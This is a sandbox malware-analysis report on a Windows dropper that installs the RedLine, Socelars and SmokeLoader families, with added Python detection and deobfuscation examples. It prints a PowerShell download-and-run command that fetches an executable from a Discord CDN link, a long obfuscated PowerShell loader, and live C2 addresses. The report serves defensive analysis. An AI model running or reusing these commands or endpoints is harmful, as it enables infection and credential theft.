Resubmissions

10/11/2021, 14:52 UTC

211110-r84p8aedej 10

09/11/2021, 13:19 UTC

211109-qkrv3sfcg4 10

Analysis

  • max time kernel
    167s
  • max time network
    185s
  • platform
    windows7_x64
  • resource
    win7-en-20211104
  • submitted
    09/11/2021, 13:19 UTC

General

  • Target

    4a4a606501eea3b8b9e128412455243ca20de0efe374c9c47ff3b5caac457375.exe

  • Size

    5.0MB

  • MD5

    2b0ce83a2a1065ef402b7a50f45892fd

  • SHA1

    d66a565247f9df9ac0bdb3725eee121e98d8914d

  • SHA256

    4a4a606501eea3b8b9e128412455243ca20de0efe374c9c47ff3b5caac457375

  • SHA512

    42d19f0130d34a3b37e78b6f1ba9c3c7e07d99e0a76dc005be976c51c2a363e64d475b9caa6805d3e8c1da2a4d32020f307eaae68b41d8c815ae1da8ec0db2ca

Malware Config

Extracted

Language
ps1
Source
Start-BitsTransfer -Source https://cdn.discordapp.com/attachments/523238636561629190/894846072097218580/ghielufuzymmuibugkhmviaajvfwio.exe -Destination C:\Users\Admin\AppData\Local\Temphkfmxgfdblkdcgixkfksjlgmfkofgu.exe
URLs
exe.dropper

https://cdn.discordapp.com/attachments/523238636561629190/894846072097218580/ghielufuzymmuibugkhmviaajvfwio.exe

Extracted

Family

socelars

C2

http://www.iyiqian.com/

http://www.hbgents.top/

http://www.rsnzhy.com/

http://www.znsjis.top/

Extracted

Family

redline

Botnet

05.10

C2

80.92.205.116:59599

Extracted

Family

smokeloader

Version

2020

C2

http://gmpeople.com/upload/

http://mile48.com/upload/

http://lecanardstsornin.com/upload/

http://m3600.com/upload/

http://camasirx.com/upload/

rc4.i32
1
0x3b22e540
rc4.i32
1
0xa6b397e0
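The SmokeLoader entry above lists two `rc4.i32` values. What follows is an added example, not code from the Triage report or from any SmokeLoader tooling: a plain RC4 implementation, checked against the published "Key"/"Plaintext" test vector, plus a helper that turns a 32-bit config value into RC4 key bytes. The little-endian byte order is this example's assumption; the report only gives the integers and does not say which key applies to which traffic direction, so `decrypt_with_config_keys` simply tries both.

```python
"""RC4 with the 32-bit keys the report lists for SmokeLoader (added example).

Assumption: each `rc4.i32` value is a 4-byte RC4 key in little-endian
byte order; the report gives only the integers.
"""

# Key values copied from the Malware Config section of the report.
SMOKELOADER_RC4_KEYS = (0x3B22E540, 0xA6B397E0)


def rc4_crypt(key: bytes, data: bytes) -> bytes:
    """RC4 key scheduling plus keystream XOR; the same call encrypts and decrypts."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    s = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                         # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def key_from_i32(value: int, byteorder: str = "little") -> bytes:
    """Turn a 32-bit config value into RC4 key bytes (byte order is an assumption)."""
    return value.to_bytes(4, byteorder)


def decrypt_with_config_keys(blob: bytes) -> dict:
    """Try every configured key; returns {hex_key: candidate plaintext} for inspection."""
    return {f"{k:#010x}": rc4_crypt(key_from_i32(k), blob) for k in SMOKELOADER_RC4_KEYS}
```

Feed a captured C2 request or response body to `decrypt_with_config_keys` and look for the candidate that yields readable structure; a wrong key produces uniformly random-looking bytes, which is what makes the try-both approach workable with only two keys.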

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 5 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 12 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 50 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 11 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Common in ransomware, but also used for sandbox and VM detection (disk size and vendor strings).

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 35 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 16 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 34 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
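The signatures above and the extracted dropper command can be turned into process-creation checks. The following is an added example, not part of the Triage report: three small rules run over records constructed from command lines shown in the Processes section of this page (PIDs 2728, 968 and 1836, the last with its hex blob truncated) plus one constructed benign control. The field names `pid`, `parent_image`, `image` and `cmdline` are an assumption, not a Sysmon or EDR schema, and the parent of the rundll32 process is not shown in the report, so that field is left out. Note that the recorded `-Destination` lacks a separator after `Temp`, so the download lands directly under `AppData\Local` as `Temphkf...exe`; the rule therefore matches on the profile root rather than on `\Temp\`.

```python
"""Process-creation checks for the behaviours in this report (added example).

Not the report's own code. Records are constructed from command lines in
the Processes section; field names are an assumption, not a real schema.
"""
import re
from urllib.parse import urlparse

# Host this report shows staging payloads; extend from your own intel.
ABUSED_FILE_HOSTS = {"cdn.discordapp.com"}

SAMPLE_EVENTS = [
    {   # PID 2728 from the report: BITS download of the next stage
        "pid": 2728,
        "parent_image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": (r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
                    r'-ExecutionPolicy bypass -noprofile -windowstyle hidden -command '
                    r'Start-BitsTransfer -Source https://cdn.discordapp.com/attachments/'
                    r'523238636561629190/894846072097218580/ghielufuzymmuibugkhmviaajvfwio.exe '
                    r'-Destination C:\Users\Admin\AppData\Local\Temphkfmxgfdblkdcgixkfksjlgmfkofgu.exe'),
    },
    {   # PID 968 from the report: rundll32 loading a DLL dropped in %TEMP%
        "pid": 968,
        "image": r"C:\Windows\SysWOW64\rundll32.exe",
        "cmdline": r'rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global',
    },
    {   # PID 1836 from the report, hex blob truncated to keep the record short
        "pid": 1836,
        "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": r'''"powershell.exe" [StriNG]::JOiN('', ( '20<22>24T28>73T45T54' -Split'<'-spLIT'j'-SpliT '~'-Split'O'-SpLIT 'r' -SPlIT'>'-SpLIT 'T'-SpLIt '%'|foReACH{( [CHaR] ([CoNveRt]::tOINT16(( $_.TosTRiNG() ) ,16 ))) } ))|& ( $VErBOSEPrEfErence.TosTRinG()[1,3]+'X'-JoiN'')''',
    },
    {   # Constructed benign control: must not match any rule
        "pid": 4242,
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": r"powershell.exe -NoProfile -Command Get-Date",
    },
]


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def bits_download_to_user_profile(ev: dict) -> bool:
    """PowerShell BITS transfer from an abused file host into the user profile."""
    cmd = ev.get("cmdline", "")
    if "start-bitstransfer" not in cmd.lower():
        return False
    src = re.search(r"-source\s+(\S+)", cmd, re.I)
    dst = re.search(r"-destination\s+(\S+)", cmd, re.I)
    if not (src and dst):
        return False
    host = (urlparse(src.group(1)).hostname or "").lower()
    # Match on the profile root: the recorded destination has no "\" after Temp.
    in_profile = re.search(r"\\Users\\[^\\]+\\AppData\\.*\.exe$", dst.group(1), re.I)
    return host in ABUSED_FILE_HOSTS and bool(in_profile)


def rundll32_temp_dll(ev: dict) -> bool:
    """rundll32 executing a DLL out of the user's Temp directory."""
    if _basename(ev.get("image", "")) != "rundll32.exe":
        return False
    return bool(re.search(r'\\AppData\\Local\\Temp\\[^"]+\.dll', ev.get("cmdline", ""), re.I))


def powershell_split_obfuscation(ev: dict) -> bool:
    """Many -Split operators plus ToInt16(..., 16): hex tokens rebuilt into a script."""
    if _basename(ev.get("image", "")) != "powershell.exe":
        return False
    cmd = ev.get("cmdline", "").lower()
    return cmd.count("-split") >= 4 and "toint16" in cmd


RULES = (bits_download_to_user_profile, rundll32_temp_dll, powershell_split_obfuscation)


def evaluate(ev: dict) -> list:
    """Names of the rules that fire for one process-creation record."""
    return [rule.__name__ for rule in RULES if rule(ev)]


def scan(events: list) -> dict:
    """Map pid -> matched rule names, omitting records with no hits."""
    hits = {}
    for ev in events:
        matched = evaluate(ev)
        if matched:
            hits[ev["pid"]] = matched
    return hits
```

The three rules deliberately key on different things: the first on the download source and destination, the second on the loader's argument path, the third on the shape of the command line rather than any specific string, so renaming the dropped files or re-randomising the delimiter characters does not evade all of them at once.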

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:464
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Drops file in Windows directory
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:880
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Drops file in System32 directory
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        • Modifies registry class
        PID:1976
    • C:\Users\Admin\AppData\Local\Temp\4a4a606501eea3b8b9e128412455243ca20de0efe374c9c47ff3b5caac457375.exe
      "C:\Users\Admin\AppData\Local\Temp\4a4a606501eea3b8b9e128412455243ca20de0efe374c9c47ff3b5caac457375.exe"
      1⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1516
      • C:\Users\Admin\AppData\Local\Temp\Graphics.exe
        "C:\Users\Admin\AppData\Local\Temp\Graphics.exe"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Checks whether UAC is enabled
        • Suspicious use of WriteProcessMemory
        PID:820
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Graphicss.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Graphicss.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1700
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" [StriNG]::JOiN('', ( '20<22>24T28>73T45T54O2dr69T74O65O6dr20r20T27<56<61O72>49T41>42r6c~45j3ar6f<66O53j27O20O27~27>20~29j20~22%2b>5b>53%54O72%49j6er67j5d>28<20<27r32T34O47O37T35r2dj37O32r7er36~63<57<36r34>59O32O30%47T33~64O2d<32%30%7eO32%37>2dr36~38%7ej37%34>3b%37r34<57%37%30%2dO37T33O6fT33>61<3b<32T66T47T32j66>47O36j33O59O36j34>7e<36<65r48<32~65j57~36<34>7e<36r39O48~37<33O47T36%33r48~36j66r7ej37r32~48>36r34~47>36r31O3b~37T30j48T37<30O48>32>65T48O36%33j48j36<66T47<36%64O2d%32j66~3br36T31j59<37%34j47~37<34O59O36~31<3b~36r33T48~36~38>6fj36>64<57~36%35r3bO36>65<48O37j34j59j37%33r7ej32O66T57%33%35T47T33~32%7er33r33<2dT33O32T6f<33<33r3b<33%38O59O33j36~59O33~33>3bT33>36O6f>33%35r57<33T36%7ej33j31j57~33~36j57%33T32~47O33O39>47~33%31r57<33~39T7e<33<30j3b<32%66r7e>33j38T6fj33j39<48O33~34r3br33T38<57T33T34<57j33~36~6fr33O30T7e<33~37r48O33<32%59~33r30O2dT33T39>47O33>37T48r33O32O2dr33<31j48r33%38j47<33%35%7e%33O38O48>33T30<3br32j66T57r36O37r3b~36O38j57>36T39j48T36<35j57<36T63~2d>37~35T59O36>36%2dO37~35r2dT37<61<3br37>39j48O36r64O6f%36%64~48T37T35<3br36O39>47>36O32>6f%37r35<7e>36%37j57O36O62%47O36T38O7e<36~64~2dj37r36>59j36j39T48O36>31O59%36O31T59r36O61O2d<37r36>3bj36<36~6f~37T37r6fr36%39%59~36r66~6f>32r65~47%36T35r3b<37r38j6fT36>35O7e>32j37j6fO33%62>59%32r34%2dO37%30>59O36>31O48j37T34O7ej36>38r6fr32<30<7e>33j64r57j32O30r6f>32%34j3b%36%35<2d>36%65T6fO37<36j3bT33r61~3b>35j34%48r34>35<59<34O64%2dj35j30>59%32~62>3b%32%32r59<36O38T2dr36%62~6f~36O36~2dO36O64j57%37~38r6f~36>37%59r36T36<48r36<34>3bj36j32r59T36~63O47j36r62>2dj36r34O47r36r33~59<36<37r3bj36<39~7e<37T38T48T36%62O57r36O36T47r36j62~59O37<33>2d<36O61~3bT36r63r2dr36j37T3b%36O64T7e~36O36j57T36>62O7er36>66<57~36T36j57r36j37j2dj37>35<7e<32j65%2dj36>35>7er37>38%59>36j35T47j32>32>47<33r62r57j32j34r7e~37%33>59O36<33r57~37r32O48j36r39O6f>37<30>2d~37r34O57O37T32j3bj37>35r2dj36O65>57r32~30%2dr33j64~57~32~30j7eO32>32>59%37r30T2dj36T66j48T37j37>6fO36<35<57<37j32r6fr37j33T2dr36>38<48>36T35~7eO36<63<59<36<63~7e
r32%65<3bT36<35T3b~37T38~3br36j35r3b<32j30~57~32<64T2d%36%33T3bO36>66~7e>36<64O59O36T64T59%36j31~47>36j65>48>36~34O7eT32T30T57O35T30<2dT36%66<3bj37j37>48<36O35~48T37>32%47%35>33~6f~36r38>57T36%35T48<36r63~2d>36j63~6fj32<30<3bT32%64j47<34j35T2dj37~38>7er36~35<6f>36j33%59T37O35<57T37j34j3b<36O39>2d>36T66T3b%36O65j3bO35<30~47~36r66j2d>36%63r59~36%39r2d<36T33>2dj37T39~59~32O30O57<36r32<48O37r39j47~37~30>6f>36T31<6fO37r33~3bj37<33T2d~32>30O48j32r64>48j36~65%48%36r66<3bO37>30<2dr37r32>48%36r66O2dT36>36O2d<36>39>59T36j63<3b>36<35r3bT32<30O47>32>64>3bj37<37>47>36%39<48j36~65>2d<36%34r6fj36~66r7er37>37O57r37~33T57O37r34<6f~37<39~3b>36~63j48<36>35%57<32>30>48r36T38O7eO36j39<7e<36r34j57T36<34O59O36j35T7e>36<65%59%32O30>47<32j64r3br36r33T6fj36O66~7e~36%64j59T36%64<48%36>31r3br36j65j3b~36>34j7eO32~30~48>35<33<47O37<34>47~36%31%2dj37j32>2dr37%34T7ej32r64~6fO34>32%3bO36%39T48~37j34T48O37>33%3b%35<34>48T37O32>48<36<31T2d~36T65r48j37>33T7e~36r36r7er36>35j3bj37O32<7e%32T30<48O32%64j47j35>33j6f>36r66<57>37O35T6f%37>32O57r36O33T3br36r35O57r32T30j59<32j34O47T37>35%48>37>32~47<36~63%7e~36r34O3br32~30~6fO32j64>6fr34r34<3b%36j35T47%37%33>47<37r34r3bj36O39~47%36j65~3b%36<31j47T37T34%48O36j39r3bj36>66O6f>36O65O2d>32%30>3bT32%34~59<37T30~7e~36<31~47<37~34j59%36>38>7e~33r62%59<32~32<47O33~62<3bO32~34~2d<36%32j7eT36~31%57%37T33>7eT36O35O7ej33j36~2d>33>34j2d>32~30O48<33j64>3b%32T30j59>35<62~2d<34O33T3b>36%66%2d%36%65O7ej37O36r57T36T35O48O37%32j7eO37r34~47r35O64j57r33j61r3b>33O61r2d<35r34r7eO36~66T6fO34r32<47%36O31>7e%37T33<47~36O35r2dO33j36O6f~33r34T7er35<33<7e<37O34j3bT37<32~48r36j39O2dr36>65%7e>36T37<2d<32<38j59%35<62O57r35<33T2d>37r39%57~37T33<57%37T34>3b~36T35r48>36r64O57>32r65O2dj35r34O59~36T35r59r37<38r47>37j34r7eO32O65%47<34O35<7er36%65<3bT36r33<7er36j66>59r36~34>6f%36%39j6fO36%65>6f<36>37r2d~35~64j6f>33T61j3br33j61T7e>35j35T6fT36T65<2dT36<39<6f%36<33~7e<36T66~6f>36T34O6f>36O35T2dr32j65O3b~34j37T6fj36%35%48%37T34<57j34~32%6fr37<39T3bO37j34T48>36<35~6f%37T33j2d>32%38O3bj32r34<57O37<33~59~3
6r33~47~37<32r57%36j39r59<37%30~47~37%34~3b<37j32>47j37r35O48O36T65O2dT32%39<7eT32<39O7e%33j62O47%37%37<48j36%38<7e<36O39T47%36>63~48O36T35~47O32%30>48%32O38<6f%32>31~6fO35r62<47T35<33O3br37%39%48<37O33~7er37O34O2dO36<35<59j36<64~47T32O65<6fj34T39T48r34r66r6f<32%65O2d~34%36r2dj36%39>47T36O63T59j36j35<2d<35~64<6fO33~61r3b>33>61>47~34j35O48>37O38r3b~36O39%6fr37O33~47j37>34>57r37%33T2d>32~38>7e~32r34~6f>37~30%57O36j31%47O37j34%59T36<38~57>32%39~59O32O39<47r37%62O57r32<30T47j34~39%48~34<35%3bj35~38%59j32O30O48O32%32r3b>37>30>3br36%66<47O37<37T7ej36%35r57<37O32j59O37j33~2d%36~38>59<36~35%3b%36~63%48~36T63O48<32r30r59%32j64r2d%34j35%3b~32>30>3b~32<34%3b<36j32<3b<36r31%3b<37<33~48O36r35~3b>33~36%6fO33%34~59%32%32j57<33T62T3bT32>30r7e%36~32T47T37%32O3bj36%35>6fO36~31~6fj36r62~7ej33>62~3bj32j30<47j37T64>2dT32j30%6f<35>33<3bT37%34~47T36r31<6f<37O32T57~37T34j6fT32%64j3b<35T30r57~37O32%59T36>66O48T36T33T6f~36O35>47T37~33%47~37<33<2d~32O38>47j32r34O6fj36T35j48r36~65r3br37<36T59%33>61j48<35~34~59>34%35j48T34O64%57r35>30>48<32%62<57T32T37<3bO36%38O6fj36j62O7er36T36T48%36<64~47>37T38O7ej36T37j48>36~36r48<36j34>7e~36<32<3br36~63<3b~36~62~47<36T34<2dr36O33T7eT36T37T6f~36~39<48T37r38r57T36<62j59%36%36T7ej36T62O2d>37O33<2dT36>61<48~36O63O59j36O37%59T36T64j7e<36r36>3bT36T62%2d>36r66~48r36r36~3b<36j37r6fr37O35O48O32j65r7e>36O35r7eO37r38r3br36T35j48%32~37>59T32>39%3b~33~62>27O20~2dT53~70r6cO69%74>20O27<57T27>20~2dO73r70j4cj69<54O20O27~6fT27%2dr53~50r6cO49j54r27%48<27>2d~53T50r4c~49>54%20r27j2dT27<2dr53~50~4c~69O54~27<7ej27~2dr53>70%4cT49r54r20r27O59~27~20~2d>73O70T4cT49>54<27<47O27<20<2d%53>50O4cr69~54T27%3b<27<7c%46j6fT72%45>41%43%68>7b%20r28%20~5bT63%6fT6e~76>65>52<74%5d<3aj3a%54>4fO69<6e>74%31j36j28~20%28<20j24<5fj2e>74r6fT53>54<72>69<4e<67<28r29<20~29O20j2cj20O31O36>20%29%2d>41j73O20r5bj43T48T61<52r5d<29~20<7dT20r29j20>2b%22~24~28O20~73%76j20<27>6fT66j53%27<20r20~27r20r27T29T22T20O7cT69~6e~76r6fr4br45r2dj45O58%50>52%45%53<73~49<6f<4e' -Split'<'-spLIT'j'-SpliT '~'-Split'O'-SpLIT 'r' 
-SPlIT'>'-SpLIT 'T'-SpLIt '%'|foReACH{( [CHaR] ([CoNveRt]::tOINT16(( $_.TosTRiNG() ) ,16 ))) } ))|& ( $VErBOSEPrEfErence.TosTRinG()[1,3]+'X'-JoiN'')
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1836
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E 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
              5⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:2312
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command Start-BitsTransfer -Source https://cdn.discordapp.com/attachments/523238636561629190/894846072097218580/ghielufuzymmuibugkhmviaajvfwio.exe -Destination C:\Users\Admin\AppData\Local\Temphkfmxgfdblkdcgixkfksjlgmfkofgu.exe
                6⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2572
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden -command Start-BitsTransfer -Source https://cdn.discordapp.com/attachments/523238636561629190/894846072097218580/ghielufuzymmuibugkhmviaajvfwio.exe -Destination C:\Users\Admin\AppData\Local\Temphkfmxgfdblkdcgixkfksjlgmfkofgu.exe
                  7⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2728
      • C:\Users\Admin\AppData\Local\Temp\FoxSBrowser.exe
        "C:\Users\Admin\AppData\Local\Temp\FoxSBrowser.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1884
      • C:\Users\Admin\AppData\Local\Temp\Process.exe
        "C:\Users\Admin\AppData\Local\Temp\Process.exe"
        2⤵
        • Executes dropped EXE
        PID:1404
      • C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
        "C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1492
      • C:\Users\Admin\AppData\Local\Temp\Install.exe
        "C:\Users\Admin\AppData\Local\Temp\Install.exe"
        2⤵
        • Executes dropped EXE
        PID:992
      • C:\Users\Admin\AppData\Local\Temp\Folder.exe
        "C:\Users\Admin\AppData\Local\Temp\Folder.exe"
        2⤵
        • Executes dropped EXE
        PID:1952
      • C:\Users\Admin\AppData\Local\Temp\Files.exe
        "C:\Users\Admin\AppData\Local\Temp\Files.exe"
        2⤵
        • Executes dropped EXE
        PID:1736
      • C:\Users\Admin\AppData\Local\Temp\File.exe
        "C:\Users\Admin\AppData\Local\Temp\File.exe"
        2⤵
        • Executes dropped EXE
        • Checks computer location settings
        • Loads dropped DLL
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:1040
        • C:\Users\Admin\Pictures\Adobe Films\MwQRXOmgQ5eY9M3tTDamT97_.exe
          "C:\Users\Admin\Pictures\Adobe Films\MwQRXOmgQ5eY9M3tTDamT97_.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          PID:824
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1040 -s 1108
          3⤵
          • Loads dropped DLL
          • Program crash
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of AdjustPrivilegeToken
          PID:2924
      • C:\Users\Admin\AppData\Local\Temp\Details.exe
        "C:\Users\Admin\AppData\Local\Temp\Details.exe"
        2⤵
        • Executes dropped EXE
        PID:1768
      • C:\Users\Admin\AppData\Local\Temp\pub2.exe
        "C:\Users\Admin\AppData\Local\Temp\pub2.exe"
        2⤵
        • Executes dropped EXE
        • Checks SCSI registry key(s)
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        PID:1656
    • C:\Windows\SysWOW64\rundll32.exe
      rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
      1⤵
      • Loads dropped DLL
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:968
    • C:\Windows\system32\rUNdlL32.eXe
      rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
      1⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1052
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
      1⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      PID:1760
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1760 CREDAT:275457 /prefetch:2
        2⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:2536
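The powershell.exe command line under Graphicss.exe (PID 1836) is a layered hex-token obfuscation: a quoted string of two-digit hex values separated by junk characters, followed by a chain of `-Split 'c'` operators that list exactly those characters, after which ForEach converts each token with `[Convert]::ToInt16($_, 16)` and casts it to `[char]`; the final `$VErBOSEPrEfErence.TosTRinG()[1,3]+'X'` indexes into the default value "SilentlyContinue" to spell `ieX`. The following decoder is an added example, not code from the report: it recovers the delimiter set from the `-Split` chain itself, peels layers until none remain, and resolves the alias trick. The first sample is a verbatim prefix of the PID 1836 command line with the hex blob cut short; the second is a constructed two-layer string that encodes `calc` twice with the same scheme.

```python
"""Peel the hex-token PowerShell obfuscation used by Graphicss.exe (added example).

Each layer is a quoted blob of two-digit hex values broken up by junk
characters, followed by -Split operators naming those characters; the
layer decodes to the next layer of script.
"""
import re

# A quoted blob immediately followed by one or more -Split 'c' operators.
_LAYER_RE = re.compile(r"'([^']+)'\s*((?:-split\s*'[^']'\s*)+)", re.IGNORECASE)
_DELIM_RE = re.compile(r"-split\s*'([^'])'", re.IGNORECASE)
# $VerbosePreference.ToString()[i,j]+'X' indexes into the default "SilentlyContinue".
_ALIAS_RE = re.compile(
    r"\$verbosepreference\.tostring\(\)\[(\d+),(\d+)\]\+'(\w)'", re.IGNORECASE)

# Verbatim prefix of the PID 1836 command line; the hex blob is truncated.
REPORT_PREFIX = (
    "\"powershell.exe\" [StriNG]::JOiN('', ( '20<22>24T28>73T45T54O2dr69T74O65O6dr20r20T27"
    "<56<61O72>49T41>42r6c~45j3ar6f<66O53j27O20O27~27>20~29j20~22%2b>5b>53%54O72%49j6er67j5d"
    ">28<20<27' -Split'<'-spLIT'j'-SpliT '~'-Split'O'-SpLIT 'r' -SPlIT'>'-SpLIT 'T'-SpLIt '%'"
    "|foReACH{( [CHaR] ([CoNveRt]::tOINT16(( $_.TosTRiNG() ) ,16 ))) } ))"
    "|& ( $VErBOSEPrEfErence.TosTRinG()[1,3]+'X'-JoiN'')"
)

# Constructed: "calc" encoded twice (inner delimiters G and -, outer < and j).
TWO_LAYER_SAMPLE = (
    "[String]::Join('', ( '27<36j33<47j36<31j2d<36j63<47j36<33j27<20j2d<53j70<6cj69<74j20"
    "<27j47<27j20<2d<73j70<6cj69<74j20<27j2d<27' -split '<' -split 'j' "
    "| % { [char][Convert]::ToInt16($_, 16) } )) | iex"
)


def find_layer(text: str):
    """Return (hex_blob, delimiters) for the first encoded layer, or None."""
    m = _LAYER_RE.search(text)
    if not m:
        return None
    delims = "".join(_DELIM_RE.findall(m.group(2)))
    return m.group(1), delims


def decode_layer(blob: str, delims: str) -> str:
    """Split on every delimiter, drop empty tokens, hex-decode each token to a char."""
    tokens = [t for t in re.split("[" + re.escape(delims) + "]", blob) if t]
    return "".join(chr(int(t, 16)) for t in tokens)


def peel_layers(cmdline: str, max_layers: int = 8) -> list:
    """Decode layer after layer; returns each recovered layer, innermost last.

    The first recovered layer of the report's sample begins with
    sET-item 'VarIABlE:ofS' '', which clears $OFS so that a [char] array
    cast to [string] joins with no separators.
    """
    text, layers = cmdline, []
    for _ in range(max_layers):
        found = find_layer(text)
        if not found:
            break
        text = decode_layer(*found)
        layers.append(text)
    return layers


def resolve_invoke_alias(cmdline: str):
    """Rebuild the `iex` alias hidden behind $VerbosePreference indexing."""
    m = _ALIAS_RE.search(cmdline)
    if not m:
        return None
    pref = "SilentlyContinue"  # default $VerbosePreference value
    return pref[int(m.group(1))] + pref[int(m.group(2))] + m.group(3)
```

On the full command line from the report, the first decoded layer is itself another `[STrIng]( '...' -Split 'W' -spLiT 'o' -SPlIT 'H' -SPLIT '-' ... )` construct with a different delimiter set, ending in `invoKE-EXPRESsIoN`; because `find_layer` reads the delimiters from the `-Split` chain rather than from a fixed list, `peel_layers` handles that second layer without changes.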

Network

    • flag-nl
      GET
      http://45.133.1.107/server.txt
      File.exe
      Remote address:
      45.133.1.107:80
      Request
      GET /server.txt HTTP/1.1
      Connection: Keep-Alive
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
      Host: 45.133.1.107
      Response
      HTTP/1.1 200 OK
      Date: Tue, 09 Nov 2021 13:23:04 GMT
      Server: Apache/2.4.41 (Ubuntu)
